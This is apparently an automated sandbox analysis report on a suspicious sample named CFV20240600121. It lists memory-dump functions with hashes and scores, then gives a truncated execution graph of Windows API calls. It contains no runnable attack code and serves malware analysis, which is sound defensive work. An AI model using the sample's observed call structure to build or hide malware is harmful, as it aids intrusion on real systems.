                                        Function 077DBA40 Relevance: .0, Instructions: 3COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a24fd12c6f86a7486f2c2ac560e18f682f56bf5fdcc16a581e66d1974da8f3fe
                                        • Instruction ID: 8434789806cbe5b5e92615c128b5d6f33f988b37a2fc1bf0181bf480aa9e2b4b
                                        • Opcode Fuzzy Hash: a24fd12c6f86a7486f2c2ac560e18f682f56bf5fdcc16a581e66d1974da8f3fe
                                        • Instruction Fuzzy Hash: 5FA002F4C19245DBD7105F51D54C3BCBBB2EB29369F018055952691755CB7805889F01

                                        Non-executed Functions

                                        Function 077D5BA8 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tb?$Tb?
                                        • API String ID: 0-2701674496
                                        • Opcode ID: fd10fadd15a0230695bfd6ed4fd61c48e37f9550b802a8ce6fe4539978e11010
                                        • Instruction ID: b5b2258783d4bcc7b39481857303e02abf4f67a0efd3c6203537aaffe62bff95
                                        • Opcode Fuzzy Hash: fd10fadd15a0230695bfd6ed4fd61c48e37f9550b802a8ce6fe4539978e11010
                                        • Instruction Fuzzy Hash: 6A6114B4E1120ADFCB08CF99D4849AEFBB1FF89350F14846AE515AB214D730AA51CFA0
                                        Function 0A138F68 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pyA
                                        • API String ID: 0-2156452511
                                        • Opcode ID: b2488ce261b8fa339271154f93b145fd7098d7b32e77bb6bc1931bf5c4949b6c
                                        • Instruction ID: 1ee79bca564dff78aaba2f65e220feaf121f9183c97a0b12ac813faa0a0c3889
                                        • Opcode Fuzzy Hash: b2488ce261b8fa339271154f93b145fd7098d7b32e77bb6bc1931bf5c4949b6c
                                        • Instruction Fuzzy Hash: 34E117B4E011198FDB14DFA9C9909AEFBB2FF89304F24C169D814AB356D730A981CF60
                                        Function 077D7F68 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: i
                                        • API String ID: 0-745908225
                                        • Opcode ID: 4b6f43254b1eb7c1b486b02e7a2a2eb6a4959a2477e54eef2eaacdc8f87aaf1b
                                        • Instruction ID: 0cf4772d5fe95828f9f79de11390234e6da1e31127a729c4bdd010b9decd4d40
                                        • Opcode Fuzzy Hash: 4b6f43254b1eb7c1b486b02e7a2a2eb6a4959a2477e54eef2eaacdc8f87aaf1b
                                        • Instruction Fuzzy Hash: 7681C2B4A15219CFCB44CFA9C58499EFBF1FB89350F24955AE419AB314D330AE02CFA5
                                        Function 077D7F58 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: i
                                        • API String ID: 0-745908225
                                        • Opcode ID: 6410d5302f61c12818e9c8eae8cb3f5c3bcad6d9aa49285d9e206dd81c84b2ec
                                        • Instruction ID: 8d54f54befcc213a37e0a8e25cafebd812a348926af1a3a33be2392e11c4be9a
                                        • Opcode Fuzzy Hash: 6410d5302f61c12818e9c8eae8cb3f5c3bcad6d9aa49285d9e206dd81c84b2ec
                                        • Instruction Fuzzy Hash: 6681C5B4A152199FCB54CFA9C58499EFBF1FB89350F14845AE415EB324D330AE42CFA1
                                        Function 077D940B Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: f`h
                                        • API String ID: 0-1810410664
                                        • Opcode ID: a7db531e4aea5d0f8b2fa9a98528d30b8f8939087e47131198191b44323082ed
                                        • Instruction ID: 76a63169befd9ab4846176a984c852816a639d0afd79195b3acbce6f21471ab6
                                        • Opcode Fuzzy Hash: a7db531e4aea5d0f8b2fa9a98528d30b8f8939087e47131198191b44323082ed
                                        • Instruction Fuzzy Hash: 946115B0E152098FCB04CFA9C5849DEFBF2FF89250F24942AD546B7225D330AE418FA5
                                        Function 077D9418 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: f`h
                                        • API String ID: 0-1810410664
                                        • Opcode ID: 68e3cff72029ffcffe5dd666d3e7a29262e7847a2eb03e2b4b4340fe76339f5e
                                        • Instruction ID: 4cd3ec58548128450d98dac61737a286c2e8e56e7a064938a8c4f6032055a70d
                                        • Opcode Fuzzy Hash: 68e3cff72029ffcffe5dd666d3e7a29262e7847a2eb03e2b4b4340fe76339f5e
                                        • Instruction Fuzzy Hash: 3D71F3B0E15209CFCB04CFA9C5849DEFBF2FF89250F24942AD556B7265D330AA418FA5
                                        Function 077D4101 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p
                                        • API String ID: 0-2181537457
                                        • Opcode ID: b449b58453f2499173f347aadc6b4eb3cc3e54369962d9b6abb2a5c60a20acff
                                        • Instruction ID: 8138798c4f42bd4755bd8481cf45aad76fb28fccc29a9e19b28f9bc2ef57aea5
                                        • Opcode Fuzzy Hash: b449b58453f2499173f347aadc6b4eb3cc3e54369962d9b6abb2a5c60a20acff
                                        • Instruction Fuzzy Hash: B031FDB1E056188FEB58CFABD84079EFBF3BBC9200F14C0AAD948A7254EB3009458F51
                                        Function 05801498 Relevance: .3, Instructions: 330COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bd01b8979283db6ec31ca4b62333fc4b60c27c657710232bcbe337a4b3bb91e
                                        • Instruction ID: 9e10fe46aca17ed8b7f311ef31ea2d4e5da9cc7f12ad3c4cde8f84de160f094b
                                        • Opcode Fuzzy Hash: 7bd01b8979283db6ec31ca4b62333fc4b60c27c657710232bcbe337a4b3bb91e
                                        • Instruction Fuzzy Hash: FCD13C70A007059FCB54DF69C894AAEBBF6FF88310B148629E81ADB355DB74E845CF90
                                        Function 05800040 Relevance: .3, Instructions: 315COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fa3ab84567a29f1cedc03c2f85116019723e41aa43d53522ebbba3e89b5a245
                                        • Instruction ID: 24caebb704e4268272375a103758030a5736ea1d29183f54f01378f8ecc2adab
                                        • Opcode Fuzzy Hash: 8fa3ab84567a29f1cedc03c2f85116019723e41aa43d53522ebbba3e89b5a245
                                        • Instruction Fuzzy Hash: 761297B24227568BE710CF65E88E189BFB1BB45328F90C209E2655F2E1DFF4154AEF44
                                        Function 0A138B30 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d68793235e70df454b4ff90da31465bd219c10c874dce8da613fc79ed68bf824
                                        • Instruction ID: dbc6ef17375a0396be14856abd1449df231cba7c4d509fa5efaab613e0ec540c
                                        • Opcode Fuzzy Hash: d68793235e70df454b4ff90da31465bd219c10c874dce8da613fc79ed68bf824
                                        • Instruction Fuzzy Hash: F9E1F7B5E011198FDB14DFA9C9809AEFBB2FF89305F24816AE414AB356D730AD41CF61
                                        Function 0A13ABA8 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a82b3fae1d51523a05c427b26308d0f5b03ef636807bd66ebe4a2cbfaa27773
                                        • Instruction ID: 747df2c9df08d0db5f45a2aa2768f189d680ac46d8cc749db63ce91ea1908eb4
                                        • Opcode Fuzzy Hash: 2a82b3fae1d51523a05c427b26308d0f5b03ef636807bd66ebe4a2cbfaa27773
                                        • Instruction Fuzzy Hash: 5BE1F6B4E011198FDB14DFA9C9809AEFBB2FF89305F248169D454AB356D731AD81CFA0
                                        Function 0A1393A0 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5b9a5de4279f53ebb7a33358782712fc0a572ffa2248da78599f80cff22aac8
                                        • Instruction ID: e2005747be648bfe899be953eb8906a15e57813699133daac4b99ab97452fbc1
                                        • Opcode Fuzzy Hash: f5b9a5de4279f53ebb7a33358782712fc0a572ffa2248da78599f80cff22aac8
                                        • Instruction Fuzzy Hash: EAE109B4E011198FDB14DFA9C9909AEFBB2FF88305F24816AD415A7356D770AD81CF60
                                        Function 0A1386F8 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a587e47606db6dcc6f1ef79a81e4cb90961ea56b854876f8c0c6bf77804ee730
                                        • Instruction ID: 514713d721ec4627ed054d5409683ad0f775982f551348ea9b857ee728809e01
                                        • Opcode Fuzzy Hash: a587e47606db6dcc6f1ef79a81e4cb90961ea56b854876f8c0c6bf77804ee730
                                        • Instruction Fuzzy Hash: ACE1E7B4E111198FDB14DFA9C9809AEFBB2FF89305F248169E414AB356D730A941CFA1
                                        Function 0A130800 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51d89b1fde5824d2e49929ce4c2af5aa3f63c2a254fa46a1ac633d5222dd36c6
                                        • Instruction ID: e7a07cd3f212516a096a1b65ab27efd286086e41388a78dc2716d13793b7f6ae
                                        • Opcode Fuzzy Hash: 51d89b1fde5824d2e49929ce4c2af5aa3f63c2a254fa46a1ac633d5222dd36c6
                                        • Instruction Fuzzy Hash: B3D10431C2075A8ACB01EBA4D994A9DF775FF95300F10D7AAD5093B224EB706AC9CF91
                                        Function 056FDE74 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aaa3ada409e823ed46d1c69c5b5b1530bf79fd72f2bf72b6f058b9bb6dfb5050
                                        • Instruction ID: 835b2fd14cfccc4536b595fe5e0bdf112af447740f1be343a6be6e7b3f2ff8c1
                                        • Opcode Fuzzy Hash: aaa3ada409e823ed46d1c69c5b5b1530bf79fd72f2bf72b6f058b9bb6dfb5050
                                        • Instruction Fuzzy Hash: 58A15F32E10215CFCF15DFB4D8849AEFBB2FF84300B15856AE906AB265DB71E955CB40
                                        Function 077DAF08 Relevance: .2, Instructions: 245COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28e083537b2d8ff762f9f52be482c0ddd5598fcece2768ac41da8c18867fdf2d
                                        • Instruction ID: d84258b389f65d9a464a90ff04d71d039b7932f4cee3cdbd50c70e2e4a554b43
                                        • Opcode Fuzzy Hash: 28e083537b2d8ff762f9f52be482c0ddd5598fcece2768ac41da8c18867fdf2d
                                        • Instruction Fuzzy Hash: 86B11CB4E112198FCB14CFA9C5809AEFBB2FB89341F24C5A9D418A7356D730AD81CF61
                                        Function 077DAEF8 Relevance: .2, Instructions: 239COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 656fae41d761324a67f1091bfd0003cf2145cf2be70e600c223b681dbf559e70
                                        • Instruction ID: 4230f2b3ea7c14709ce48f2defbb0de477616bd3bcf1016bef3d50a999d089e4
                                        • Opcode Fuzzy Hash: 656fae41d761324a67f1091bfd0003cf2145cf2be70e600c223b681dbf559e70
                                        • Instruction Fuzzy Hash: 0AB10CF4E112198FCB14CFA9C5809AEBBB2BB89341F25C5AAD418A7256D7309D81CF61
                                        Function 05800033 Relevance: .2, Instructions: 221COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f27940024751a0ee14738f8896b424e08ee595649570ec8002ebbc31a00b6caf
                                        • Instruction ID: ee862508949835050f7cbc0c7bc53b7d7e532ab8613b5fae7b6cce0cad3b7614
                                        • Opcode Fuzzy Hash: f27940024751a0ee14738f8896b424e08ee595649570ec8002ebbc31a00b6caf
                                        • Instruction Fuzzy Hash: E4C1FBB24227568BD710CF65E88A189BFB1FB85328F50C709E1616B2E0DFF4254AEF44
                                        Function 077D8B18 Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2a579a2e0f3899b9336036c44cba3b919be717b843282e48bd1b81fe9602f20
                                        • Instruction ID: a0d5f1ba068a032298f77962fe7e67acfb45d4759ee9d3bad7642dd94cde153d
                                        • Opcode Fuzzy Hash: e2a579a2e0f3899b9336036c44cba3b919be717b843282e48bd1b81fe9602f20
                                        • Instruction Fuzzy Hash: AF71E3F0E1520ADFCB04CF99C5819AEFBB1FF49350F14855AD415AB204C730AA82CFAA
                                        Function 077D8B08 Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2977da278bdf989c8d1979be301a9d60e4c5eb68dfe7b835f13f216c4f8f3c74
                                        • Instruction ID: cba41db4dac0f139486f7a3e29ee0d9cd51f59234001ab123b1524c0351aaa49
                                        • Opcode Fuzzy Hash: 2977da278bdf989c8d1979be301a9d60e4c5eb68dfe7b835f13f216c4f8f3c74
                                        • Instruction Fuzzy Hash: 436106F4E1124ADFCB04CF99C4818AEFBB2FF4A350F14855AD415AB255D730A982CF96
                                        Function 077D8E28 Relevance: .2, Instructions: 164COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0f3c67371c51434bfbb6a3b196dfe68f02285d0deef72d4d56561798baf0dd1
                                        • Instruction ID: 0e4ce78c72baa2e97f8c8d5836762e9b7c4d0eaa36b137eaa8932c71da03f7f3
                                        • Opcode Fuzzy Hash: f0f3c67371c51434bfbb6a3b196dfe68f02285d0deef72d4d56561798baf0dd1
                                        • Instruction Fuzzy Hash: 906127B0E11249DFCB04CFA6D5815EEFBB2BF89340F14941AD515B7214D738AA42CFA6
                                        Function 077D91D3 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0470939dca4ed6912f790086e6628376f6e546724d76b7d634e8502c3193510f
                                        • Instruction ID: fc4868b242e1997ff0f5828467bcac43ea69d29a97caf07e4dcd3c3a55b6e490
                                        • Opcode Fuzzy Hash: 0470939dca4ed6912f790086e6628376f6e546724d76b7d634e8502c3193510f
                                        • Instruction Fuzzy Hash: 4841F7B0E1520A9FCB44CFAAC4815EEFBF2EF89350F14C06AC515A7254E734AA41CFA4
                                        Function 077D91E0 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c5ccef6f509a9db34ab2032ffe4332c89e0e56d55a623d2e4db55d067e6465a
                                        • Instruction ID: dec5d46cde9e134cac3b19a315a82866193672addf8fb89828d105f0ef5cb855
                                        • Opcode Fuzzy Hash: 3c5ccef6f509a9db34ab2032ffe4332c89e0e56d55a623d2e4db55d067e6465a
                                        • Instruction Fuzzy Hash: FF41F8B0E1520A9FCB44CFAAC4815EEFBF2EF89350F14D06AC515A7254E734AA51CFA4
                                        Function 077D9683 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 983736807d74e0016dac1c149c932b6f89f7b8d6a0f6e6999ab0e77e80e8d158
                                        • Instruction ID: 1fecf868acece1a0f331351f0722ef2d336d8a935c7058f05feff37dba9f6dad
                                        • Opcode Fuzzy Hash: 983736807d74e0016dac1c149c932b6f89f7b8d6a0f6e6999ab0e77e80e8d158
                                        • Instruction Fuzzy Hash: CE41F4B0E1560ADBCB44CFAAC5815EEFBF2EF89240F24C46AC505A7254D734AA41CF91
                                        Function 077D9690 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bee9506d285572781b473f2dc5d06c937377fdcbee6f6a7d73ac5880ed0e0c8
                                        • Instruction ID: 85c2b85b0eeea6d6457ede54c4361c2df5f7a428caddc3ba2553be96abac158d
                                        • Opcode Fuzzy Hash: 5bee9506d285572781b473f2dc5d06c937377fdcbee6f6a7d73ac5880ed0e0c8
                                        • Instruction Fuzzy Hash: A441E3B0E1560ACBDB48CFAAC5815EEFBF2FF89250F24C46AC505B7214D734AA418F91
                                        Function 077DEFB8 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4c35726c925f6a5c55c3604432d755305b64a59d37b73bdfd123ef7f5ab117c
                                        • Instruction ID: fd0ee85f0a6b9653ae42455e30ac68fbbe3c59a9e7b8f195e081ba3b14d823e0
                                        • Opcode Fuzzy Hash: e4c35726c925f6a5c55c3604432d755305b64a59d37b73bdfd123ef7f5ab117c
                                        • Instruction Fuzzy Hash: 912113B1E112199BDB08CFAAD9416EEFBF7AFC8310F14C13AD418B7254EB345A018B91
                                        Function 0A13EF37 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63401f445c47d64a8f45d651419fbceb99821cfcfb2ceee5d97b57e949a5e7c6
                                        • Instruction ID: faf2c70cad59a06ad3fb4618b4f2a91af27ad39618d4c35ff8bcf3738ea1e378
                                        • Opcode Fuzzy Hash: 63401f445c47d64a8f45d651419fbceb99821cfcfb2ceee5d97b57e949a5e7c6
                                        • Instruction Fuzzy Hash: EBC04C67D9E004F685284DC571090F8BB3CD78F1A3F023055D15EA7052876291664554

                                        Execution Graph

                                        Execution Coverage:1.1%
                                        Dynamic/Decrypted Code Coverage:4.7%
                                        Signature Coverage:7.4%
                                        Total number of Nodes:148
                                        Total number of Limit Nodes:14
                                        execution_graph 94756 42df43 94757 42df53 94756->94757 94758 42df59 94756->94758 94761 42cf43 94758->94761 94760 42df7f 94764 42b2c3 94761->94764 94763 42cf5e 94763->94760 94765 42b2dd 94764->94765 94766 42b2ee RtlAllocateHeap 94765->94766 94766->94763 94767 1412b60 LdrInitializeThunk 94768 423de3 94769 423dff 94768->94769 94770 423e27 94769->94770 94771 423e3b 94769->94771 94772 42afb3 NtClose 94770->94772 94778 42afb3 94771->94778 94774 423e30 94772->94774 94775 423e44 94781 42cf83 RtlAllocateHeap 94775->94781 94777 423e4f 94779 42afd0 94778->94779 94780 42afe1 NtClose 94779->94780 94780->94775 94781->94777 94825 424173 94830 424182 94825->94830 94826 42420c 94827 4241c6 94828 42ce63 RtlFreeHeap 94827->94828 94829 4241d6 94828->94829 94830->94826 94830->94827 94831 424207 94830->94831 94832 42ce63 RtlFreeHeap 94831->94832 94832->94826 94833 42a5f3 94834 42a60d 94833->94834 94837 1412df0 LdrInitializeThunk 94834->94837 94835 42a635 94837->94835 94838 4286b3 94840 428710 94838->94840 94839 428743 94840->94839 94843 413843 94840->94843 94842 428725 94844 413820 94843->94844 94846 4137e1 94843->94846 94845 413872 94844->94845 94849 42b223 94844->94849 94846->94842 94850 42b23d 94849->94850 94853 1412c70 LdrInitializeThunk 94850->94853 94851 413825 94851->94842 94853->94851 94782 41dd03 94783 41dd29 94782->94783 94786 41de11 94783->94786 94788 42e073 94783->94788 94785 41ddb5 94785->94786 94794 42a643 94785->94794 94789 42dfe3 94788->94789 94790 42e040 94789->94790 94791 42cf43 RtlAllocateHeap 94789->94791 94790->94785 94792 42e01d 94791->94792 94798 42ce63 94792->94798 94795 42a660 94794->94795 94804 1412c0a 94795->94804 94796 42a68c 94796->94786 94801 42b313 94798->94801 94800 42ce7c 94800->94790 94802 42b32d 94801->94802 94803 42b33e RtlFreeHeap 94802->94803 94803->94800 94805 1412c11 94804->94805 94806 1412c1f LdrInitializeThunk 94804->94806 94805->94796 94806->94796 94807 4188e3 94809 418913 94807->94809 94810 41893f 94809->94810 94811 41ac23 94809->94811 94812 41ac67 94811->94812 94813 41ac88 94812->94813 94814 42afb3 NtClose 94812->94814 94813->94809 94814->94813 94815 413c83 94816 413c9d 94815->94816 94821 417633 94816->94821 94818 413cb8 94819 413cfd 94818->94819 94820 413cec PostThreadMessageW 94818->94820 94820->94819 94822 417657 94821->94822 94823 417693 LdrLoadDll 94822->94823 94824 41765e 94822->94824 94823->94824 94824->94818 94854 401bb5 94855 401bb9 94854->94855 94856 401b5d 94854->94856 94856->94856 94859 42e403 94856->94859 94862 42ca53 94859->94862 94863 42ca79 94862->94863 94874 4073b3 94863->94874 94865 42ca8f 94873 401b7a 94865->94873 94877 41aa33 94865->94877 94867 42caae 94868 42cac3 94867->94868 94892 42b363 94867->94892 94888 427063 94868->94888 94871 42cad2 94872 42b363 ExitProcess 94871->94872 94872->94873 94895 416363 94874->94895 94876 4073c0 94876->94865 94878 41aa5f 94877->94878 94906 41a923 94878->94906 94881 41aa8c 94883 42afb3 NtClose 94881->94883 94886 41aa97 94881->94886 94882 41aaa4 94884 42afb3 NtClose 94882->94884 94885 41aac0 94882->94885 94883->94886 94887 41aab6 94884->94887 94885->94867 94886->94867 94887->94867 94889 4270bd 94888->94889 94891 4270ca 94889->94891 94917 418183 94889->94917 94891->94871 94893 42b37d 94892->94893 94894 42b38e ExitProcess 94893->94894 94894->94868 94896 41637a 94895->94896 94898 416393 94896->94898 94899 42b9e3 94896->94899 94898->94876 94901 42b9fb 94899->94901 94900 42ba1f 94900->94898 94901->94900 94902 42a643 LdrInitializeThunk 94901->94902 94903 42ba74 94902->94903 94904 42ce63 RtlFreeHeap 94903->94904 94905 42ba8d 94904->94905 94905->94898 94907 41aa19 94906->94907 94908 41a93d 94906->94908 